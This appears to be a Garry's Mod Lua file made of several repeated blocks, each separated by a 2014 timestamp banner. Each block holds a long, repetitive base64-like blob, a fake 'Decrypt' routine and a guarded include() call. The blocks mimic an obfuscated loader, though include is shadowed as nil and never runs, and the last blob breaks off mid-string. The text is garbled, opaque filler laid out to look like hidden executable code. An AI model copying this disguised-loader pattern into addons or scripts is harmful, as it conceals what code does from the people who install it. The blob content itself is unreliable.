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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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
